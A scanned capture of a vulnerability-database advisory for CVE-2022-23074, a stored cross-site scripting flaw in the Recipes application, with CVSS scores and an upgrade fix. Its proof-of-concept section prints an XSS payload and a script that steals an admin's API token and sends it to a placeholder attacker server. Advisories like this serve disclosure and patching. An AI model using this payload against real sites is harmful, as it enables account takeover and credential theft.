www.mend.io
Open in
urlscan Pro
2600:9000:225a:7c00:1c:c724:8440:93a1
Public Scan
URL:
https://www.mend.io/vulnerability-database/CVE-2022-23074
Submission: On June 29 via api from NL — Scanned from NL
Submission: On June 29 via api from NL — Scanned from NL
Form analysis
0 forms found in the DOMText Content
* Product * Mend SCA * Mend SAST * Mend Renovate * Supply Chain Defender * Integrations for Developers' Environments * Solutions * Mend Platform * Open Source Security * Open Source License Compliance * Software Bill of Materials (SBOM) * Open Source Audit * Pricing * Company * About Us * Diversity & Inclusion * Careers * Press Releases * Events * Partners * Customers * Contact Us * Resources * Resource Center * Blog * Product Info * Success Stories * Vulnerability Database * Languages * Integrations * Documentation Request a Demo * Log In * Vulnerabilities * Projects * About Us * Contact Us * * * * Vulnerabilities * Projects * About Us * Contact Us -------------------------------------------------------------------------------- * * * Home > Vulnerability Database > CVE-2022-23074 MEND VULNERABILITY DATABASE What is a CVE vulnerability ID? What is a WS vulnerability ID? New vulnerability? Tell us about it! WE FOUND RESULTS FOR “” * Previous * 1 * 2 * 3 * ... * Next CVE-2022-23074 DATE: JUNE 21, 2022 OVERVIEW In Recipes, versions 0.17.0 through 1.2.5 are vulnerable to Stored Cross-Site Scripting (XSS), in the ‘Name’ field of Keyword, Food and Unit components. When a victim accesses the Keyword/Food/Unit endpoints, the XSS payload will trigger. A low privileged attacker will have the victim's API key and can lead to admin's account takeover. DETAILS In Recipes, versions 0.17.0 through 1.2.5 are vulnerable to Stored Cross-Site Scripting (XSS), in the ‘Name’ field of Keyword, Food and Unit components. When a victim accesses the Keyword/Food/Unit endpoints, the XSS payload will trigger. A low privileged attacker will have the victim's API key and can lead to admin's account takeover. POC DETAILS Access the application through a web browser and login as a user. Now navigate to the food list from the navigation bar. On the food list page, click on the plus '+' icon. Under the name input field, enter the XSS payload given in the "POC Code" section below and save it. Then host the JavaScript file for fetching the victim's API (the code for the JavaScript file can be found in the "POC Code" section below). In a new browser window, login as administrator and access the food list page (for example). This will trigger the XSS payload and the attacker will receive the admin's API key in the listener. POC CODE XSS payload: <img src=a onerror="var x=document.createElement('script');x.src='<attacker_server>/api.js';document.body.appendChild(x);"> JavaScript file (api.js): var req = new XMLHttpRequest(); req.onload = handleResponse; req.open('get','/settings/',true); req.send(); function handleResponse() { t var a=this.responseText.match(/Authorization: Token.{1,}/)[0]; t a=a.split("Token ")[1]; t a=a.split("<")[0]; t console.log(a); t var changeReq = new XMLHttpRequest(); changeReq.open('get', '<attacker_server>:<attacker_port>/api='+a, false); changeReq.send() AFFECTED ENVIRONMENTS 0.17.0 through 1.2.5 PREVENTION Update version to 1.2.6 or higher LANGUAGE: PYTHON GOOD TO KNOW: * Severity Score * Weakness Type (CWE) * Top Fix 5.4 Cross-Site Scripting (XSS) CWE-79 UPGRADE VERSION Upgrade to version 1.2.6 Learn More * CVSS v3.1 * CVSS v2 Base Score: 5.4 Attack Vector (AV): Network Attack Complexity (AC): Low Privileges Required (PR): Low User Interaction (UI): Required Scope (S): Changed Confidentiality (C): Low Integrity (I): Low Availability (A): None Base Score: 3.5 Access Vector (AV): Network Access Complexity (AC): Medium Authentication (AU): Single Confidentiality (C): None Integrity (I): Partial Availability (A): None Additional information: RELATED RESOURCES (3) Url: https://nvd.nist.gov/vuln/detail/CVE-2022-23074 Url: https://github.com/TandoorRecipes/recipes/commit/7b2117c0190d4f541ba4cc7ee4122f04738c4ac6 Url: https://www.mend.io/vulnerability-database/CVE-2022-23074 This website uses 'cookies' to give you the most relevant experience. By browsing this site you are agreeing to our use of cookies. Find out more about our privacy policy.Okay, thanks